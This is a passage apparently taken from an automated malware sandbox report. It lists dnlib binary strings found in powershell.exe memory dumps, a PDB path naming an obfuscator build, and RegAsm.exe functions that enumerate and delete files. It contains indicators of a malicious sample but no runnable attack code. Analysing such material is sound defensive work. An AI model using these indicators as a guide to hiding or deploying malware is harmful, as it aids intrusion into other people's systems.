                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\dnlib-fuscator-master win7 fix\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_00408847
